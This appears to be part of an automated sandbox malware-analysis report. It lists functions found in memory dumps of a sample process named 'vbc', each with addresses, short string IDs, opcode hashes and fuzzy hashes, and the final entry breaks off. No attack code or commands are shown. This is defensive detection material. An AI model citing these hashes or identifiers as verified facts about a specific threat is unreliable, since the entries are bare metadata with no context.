                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00541890 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L%S
                                                                                                    • API String ID: 0-2622520607
                                                                                                    • Opcode ID: 53940e0579874139e2543b02c0887ae88de406df4c19f590d266ef8e9e6cba73
                                                                                                    • Instruction ID: c29ac65212a97488adf4839ef88ee33fefec1946af1a105734cd15b7be100ad1
                                                                                                    • Opcode Fuzzy Hash: 53940e0579874139e2543b02c0887ae88de406df4c19f590d266ef8e9e6cba73
                                                                                                    • Instruction Fuzzy Hash: 4161EF30E006498FCB04DBBAD8587EEBBF2FF89314F118569D51AAB340DB309D458BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005270A0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: DP
                                                                                                    • API String ID: 0-458182505
                                                                                                    • Opcode ID: 469a99f6e584d04bc8f911661a34419189ea9c5059ad219cfd2a3be538120b10
                                                                                                    • Instruction ID: 9c79c7ce1e1d4a08748679f9dcae2a775d5e456ca607bf679b15f805a36ffce1
                                                                                                    • Opcode Fuzzy Hash: 469a99f6e584d04bc8f911661a34419189ea9c5059ad219cfd2a3be538120b10
                                                                                                    • Instruction Fuzzy Hash: 1A515930A0C5B88FC715DB64D84457EBFF2BF87304B14859ED0669B282CB319D0ACB96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DF48 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID: 0-3916222277
                                                                                                    • Opcode ID: 2e9a2f5d05e3fe777dc154dd7e1d80670875d6b01f641a38ff768588ce145db6
                                                                                                    • Instruction ID: b645bf38ed30d91c95189d843a18af09dd10ee8a5b2666c7e3737b4bc77ce94a
                                                                                                    • Opcode Fuzzy Hash: 2e9a2f5d05e3fe777dc154dd7e1d80670875d6b01f641a38ff768588ce145db6
                                                                                                    • Instruction Fuzzy Hash: B151D131F0811C8FCB10EF94DC805BEB7B2FBC4218B258A7AC525DB745D676A9068BD2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005458A0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: X-[l
                                                                                                    • API String ID: 0-35881998
                                                                                                    • Opcode ID: 43e3b11aee2c806791002e4190e1c5b19da9575a21e5395777399895338c9628
                                                                                                    • Instruction ID: 96af84ac8a9802aa5a874d650543d2705f1a4177c20e464734a28a6ebf594234
                                                                                                    • Opcode Fuzzy Hash: 43e3b11aee2c806791002e4190e1c5b19da9575a21e5395777399895338c9628
                                                                                                    • Instruction Fuzzy Hash: 8D51AE357005048FCB14DF69D890AAEBBE2FF89314B16816AEA45DF762DB31EC01CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005436D0 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S
                                                                                                    • API String ID: 0-425963014
                                                                                                    • Opcode ID: efc4d25f2341a45db583b80442c779259c066f94fe2d4b53950ba35456b18777
                                                                                                    • Instruction ID: f436e50bdac5fc971122bb88f8e3ff10372e9bdd0a896891f627e966057bcd4f
                                                                                                    • Opcode Fuzzy Hash: efc4d25f2341a45db583b80442c779259c066f94fe2d4b53950ba35456b18777
                                                                                                    • Instruction Fuzzy Hash: DD513D76600100AFCB459FA8CD45D69BFF6FF89314B1680A8E2099B772DB32DD21DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F2121 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \6N
                                                                                                    • API String ID: 0-2191520548
                                                                                                    • Opcode ID: ad0cc3dfa4ed76cd5a4dec8206787e6ac30c281349b637d2ae167a704bbafd6a
                                                                                                    • Instruction ID: f83bfcb07a39bf190df9cd54b94e7a9475ae81395eb2802f82b756fe44762bc3
                                                                                                    • Opcode Fuzzy Hash: ad0cc3dfa4ed76cd5a4dec8206787e6ac30c281349b637d2ae167a704bbafd6a
                                                                                                    • Instruction Fuzzy Hash: 6541BE30704248DBC705AF65D5945BF77B7EBC8310B248529EA02E73A9CB78AD028B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F2130 Relevance: 1.4, Strings: 1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: \6N
                                                                                                    • API String ID: 0-2191520548
                                                                                                    • Opcode ID: 8f85132e8266b3aaa7254ed0e21a411a5eafa559f96bb7a11845bc75a154aad2
                                                                                                    • Instruction ID: 1d0c722ab194c35d4bf40e0d6361873519463ee88ee559afba2309e3f849ae10
                                                                                                    • Opcode Fuzzy Hash: 8f85132e8266b3aaa7254ed0e21a411a5eafa559f96bb7a11845bc75a154aad2
                                                                                                    • Instruction Fuzzy Hash: D041BF30700248DBC705AF65D59457F77B7EFC8310F248529EA02EB3A9CB78AD028B96
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FA1A0 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: M
                                                                                                    • API String ID: 0-945609351
                                                                                                    • Opcode ID: 73bf091cf1c6a63de029401926091fd63e04f66ff444b1e65c59cfe8d7a3d5d3
                                                                                                    • Instruction ID: a173f8405f803de6e3aca67425893020f982ba0745b393f425e14bbf6cd4a1e1
                                                                                                    • Opcode Fuzzy Hash: 73bf091cf1c6a63de029401926091fd63e04f66ff444b1e65c59cfe8d7a3d5d3
                                                                                                    • Instruction Fuzzy Hash: C331B470B052498FCB04DB58D8908AEBBF1EF48350B16C1ABD959DB391D734EC128B99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FF7F8 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 2
                                                                                                    • API String ID: 0-450215437
                                                                                                    • Opcode ID: 8d964b0fe152a9d8b2b332c3896020fa87f8334c6036857670f30efb206bc9e5
                                                                                                    • Instruction ID: c31010ddbb41e37d1fc37e46ad553b2019993c10be96db7755703a109b77d01b
                                                                                                    • Opcode Fuzzy Hash: 8d964b0fe152a9d8b2b332c3896020fa87f8334c6036857670f30efb206bc9e5
                                                                                                    • Instruction Fuzzy Hash: 8F316035A0011DEFDB04EFA4E8909FEBB75EF48350F10803AF902A7254DB35994ADB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484DBF0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (FZl
                                                                                                    • API String ID: 0-881144082
                                                                                                    • Opcode ID: 2964fd44305b64d7d91823817da65760699034fdec58d3a4920663f82b4771b4
                                                                                                    • Instruction ID: d2767a2c4459cda76e0b43a686d20af366a8c9c2bc1510bfbb5ba842f747c935
                                                                                                    • Opcode Fuzzy Hash: 2964fd44305b64d7d91823817da65760699034fdec58d3a4920663f82b4771b4
                                                                                                    • Instruction Fuzzy Hash: 3521283170452C8F9325B7A8EC5053F62E9EBC4748B008B3AE80BDB789DB64AC0147D6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1100 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: X-[l
                                                                                                    • API String ID: 0-35881998
                                                                                                    • Opcode ID: bad1fdb3cfd1b68b9be497d0fdf519dc2a470ccea783959bac13d2120daa27e0
                                                                                                    • Instruction ID: 6895f47e96b3813333fb6f8e829ebc6a3d0db57463a86cf155858cac0dda9f36
                                                                                                    • Opcode Fuzzy Hash: bad1fdb3cfd1b68b9be497d0fdf519dc2a470ccea783959bac13d2120daa27e0
                                                                                                    • Instruction Fuzzy Hash: 63210130709648CFD705EB60895447F3BE29BC630471586ABE706CB3A5DF384D069B97
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00544678 Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8HT
                                                                                                    • API String ID: 0-2174696922
                                                                                                    • Opcode ID: 0b45f5374f8a08518b2603302ea94cc32a49fae04319366d0a8229344630278d
                                                                                                    • Instruction ID: 2077be25658bca1991fbbdcd11054bebd946a8b4ca3b78a12fff4a1574172a77
                                                                                                    • Opcode Fuzzy Hash: 0b45f5374f8a08518b2603302ea94cc32a49fae04319366d0a8229344630278d
                                                                                                    • Instruction Fuzzy Hash: 70317A75E402489FCB18DFA4D484AEEBFB1FF89314F15856AE400B7290DB319906CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484FA38 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: H6K
                                                                                                    • API String ID: 0-3923381255
                                                                                                    • Opcode ID: 1324d63fc69331115a3aa573371d088b26cd5f3d288f2ea68fbf4b9203faf5c9
                                                                                                    • Instruction ID: c45906f4c98df2687ae9ce4e5aecab267596f1b2e4cf129aeca0a574878e8bdb
                                                                                                    • Opcode Fuzzy Hash: 1324d63fc69331115a3aa573371d088b26cd5f3d288f2ea68fbf4b9203faf5c9
                                                                                                    • Instruction Fuzzy Hash: 8321D1357001449FD7097B7A989893E659BEBC9701F05853EFA02CB395CF755C014BA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00260567 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TVZl
                                                                                                    • API String ID: 0-155880774
                                                                                                    • Opcode ID: 9594660e0983a43f876cb7cfa21897c849af60c4fee0cac3c867819e96f037e5
                                                                                                    • Instruction ID: b64da26064f39b955fd13d47874faf4aa20e05bdd8ce8802fe2c771109805f9b
                                                                                                    • Opcode Fuzzy Hash: 9594660e0983a43f876cb7cfa21897c849af60c4fee0cac3c867819e96f037e5
                                                                                                    • Instruction Fuzzy Hash: F1212638A01208CFCB44CFA8D8949EDBBF1FF49311F10916AE906AB761DB31A945CF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543BCA Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: P+F
                                                                                                    • API String ID: 0-2050158190
                                                                                                    • Opcode ID: 326b1802955bad52c769cf0e03e18959d0e3f52ab104f6ac51cf966da92e1796
                                                                                                    • Instruction ID: 9c6f12b971646ca3de2aa2a22b0630da4c0dae73d5fbbaf72be1dc8549d69e89
                                                                                                    • Opcode Fuzzy Hash: 326b1802955bad52c769cf0e03e18959d0e3f52ab104f6ac51cf966da92e1796
                                                                                                    • Instruction Fuzzy Hash: 8F217C36A04208DFCB158F68C8589EE7FB2BF8C324F158129E811B73A0CA719D45CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543400 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 8RS
                                                                                                    • API String ID: 0-2950058658
                                                                                                    • Opcode ID: ff9b7f48fc87fead5a02c9f75b7b932827fe11a50b3768073a5bca2631fb7728
                                                                                                    • Instruction ID: 0c936c74c0160d8c05a308b2d4f1cc7e00e2b49cd1d270d83ea39dc593e5ca09
                                                                                                    • Opcode Fuzzy Hash: ff9b7f48fc87fead5a02c9f75b7b932827fe11a50b3768073a5bca2631fb7728
                                                                                                    • Instruction Fuzzy Hash: 5821CF307002014FCB54EB65E8597AE7BE6FBC8304F048939E14AEB2A1DBB569098B91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0054AA59 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: <,S
                                                                                                    • API String ID: 0-425963014
                                                                                                    • Opcode ID: 1bb7b9df022da3c9470536016991afec7b97372d8f21b70919b79a9d22cb5a34
                                                                                                    • Instruction ID: b21ecd4e8479adbe5e90fa18e0020382f7d11ededd33be05c26ba051ebf017ba
                                                                                                    • Opcode Fuzzy Hash: 1bb7b9df022da3c9470536016991afec7b97372d8f21b70919b79a9d22cb5a34
                                                                                                    • Instruction Fuzzy Hash: C0218176A042589FCB19DF94D844CDEBBF9EF89300F01846AE545EB751DA30AD05CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484A241 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: `K
                                                                                                    • API String ID: 0-3307921728
                                                                                                    • Opcode ID: 21c0c7bb70043e95d429c00b3a122c1893c27833814373f1b3fec7b1166f99b5
                                                                                                    • Instruction ID: 3187ce52cd54ff1360e4fc562b159a268f4212dd50733742f690e3f8c5658831
                                                                                                    • Opcode Fuzzy Hash: 21c0c7bb70043e95d429c00b3a122c1893c27833814373f1b3fec7b1166f99b5
                                                                                                    • Instruction Fuzzy Hash: 0911D2303087881FC315DF79C8904597FA2EECA224359CBAED599CF6A2DB35E8069790
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 048496E0 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: XYK
                                                                                                    • API String ID: 0-395958303
                                                                                                    • Opcode ID: c401087ce90c426d9741f82e76b1a2f63fd386a7ab34f022a37f5681f506ba96
                                                                                                    • Instruction ID: 7d676b17a75eff0f2dc404cd414614315254ab52a7c2f3af14779972907e06ad
                                                                                                    • Opcode Fuzzy Hash: c401087ce90c426d9741f82e76b1a2f63fd386a7ab34f022a37f5681f506ba96
                                                                                                    • Instruction Fuzzy Hash: 8111E6307087845FC321DF79889085ABFA6DEC6214325CABEC199CB292EF359C068761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CEA0 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @P
                                                                                                    • API String ID: 0-2133035629
                                                                                                    • Opcode ID: c38fdd6066742c8ff5c2686e45b9e0bc725f56603cd683e850736aa9616e7cd7
                                                                                                    • Instruction ID: 7002606a1fd478002886d5c979a15bea7bf5e10a54697a29007afd3627c3aad6
                                                                                                    • Opcode Fuzzy Hash: c38fdd6066742c8ff5c2686e45b9e0bc725f56603cd683e850736aa9616e7cd7
                                                                                                    • Instruction Fuzzy Hash: 100128347082319F9B136614B9C047E2FABBFD7750721496BE802C73CBDA644C029792
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 002605AA Relevance: 1.3, Strings: 1, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: TVZl
                                                                                                    • API String ID: 0-155880774
                                                                                                    • Opcode ID: b177b2f00304363464ba7b2c5dc8dd7c0d127287dd93591de5257f129f5be4c6
                                                                                                    • Instruction ID: 598ef3eafe1df9d8087ab1f54e0e2abda5847ca3049102f65179e025804f2566
                                                                                                    • Opcode Fuzzy Hash: b177b2f00304363464ba7b2c5dc8dd7c0d127287dd93591de5257f129f5be4c6
                                                                                                    • Instruction Fuzzy Hash: FE118D78E102088FCB44DFA9D4988ADBBF1FF49315B2194AAE516AB760DB31AD01CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484C490 Relevance: 1.3, Strings: 1, Instructions: 18COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 5M
                                                                                                    • API String ID: 0-3951422820
                                                                                                    • Opcode ID: 191c92c2bc5152a2f5d764a1fb7f9deadce18d0411323b29f4eba8965d9a8399
                                                                                                    • Instruction ID: 8436b366b4931051596863542877a42aef2a5faac951b2c63b13b2b7a05de35c
                                                                                                    • Opcode Fuzzy Hash: 191c92c2bc5152a2f5d764a1fb7f9deadce18d0411323b29f4eba8965d9a8399
                                                                                                    • Instruction Fuzzy Hash: FBE0C2B2D09148EFCB01CFB49C106EE7BF0DB12244F1141EBC804D7212EA300F149B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005206A8 Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: k/R
                                                                                                    • API String ID: 0-750450022
                                                                                                    • Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                    • Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
                                                                                                    • Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
                                                                                                    • Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00521F48 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: xP
                                                                                                    • API String ID: 0-520751687
                                                                                                    • Opcode ID: a08c9f29c6c7e2e217ce7fb3d44bbcbd5810045ca1b487b54692050d43385e75
                                                                                                    • Instruction ID: fd129672e4f29693defad0208d1a434572e6ef5084a468bc02cdb77fb94ea902
                                                                                                    • Opcode Fuzzy Hash: a08c9f29c6c7e2e217ce7fb3d44bbcbd5810045ca1b487b54692050d43385e75
                                                                                                    • Instruction Fuzzy Hash: F7D0C97294510CAF8B40DFE88D01A9FBBF9EB45204F1145A69908D7251EE315F10AB92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00265CE8 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L9K
                                                                                                    • API String ID: 0-1766570004
                                                                                                    • Opcode ID: 4d21eab47fe136614dda98bc48438d0c0f72c92e033cf73b82a38e22df2ed983
                                                                                                    • Instruction ID: 35fe176bfad74f04b58d0bb13acf7218fab6265f3f64b5ae1a814893cbb41408
                                                                                                    • Opcode Fuzzy Hash: 4d21eab47fe136614dda98bc48438d0c0f72c92e033cf73b82a38e22df2ed983
                                                                                                    • Instruction Fuzzy Hash: 04D0C97190510CAF8B00DFE98D0199EB7F9EB05214B1181A69908D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484AAA8 Relevance: 1.3, Strings: 1, Instructions: 14COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: @FK
                                                                                                    • API String ID: 0-3371574345
                                                                                                    • Opcode ID: 4c51815717ea132becbcf7cf54c63842703e843e7c14f6edc46ec65890f7e63d
                                                                                                    • Instruction ID: 5fc17feff21382683940cce37820c5b6b2893cd6ceeed0b04b7b762fac0d7191
                                                                                                    • Opcode Fuzzy Hash: 4c51815717ea132becbcf7cf54c63842703e843e7c14f6edc46ec65890f7e63d
                                                                                                    • Instruction Fuzzy Hash: 7CD0C971D0510CAF8B00DFE89D0199EB7F9EB45204B1181A69908D7211EA315F106B92
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 04849610 Relevance: 1.3, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: ;K
                                                                                                    • API String ID: 0-2623890911
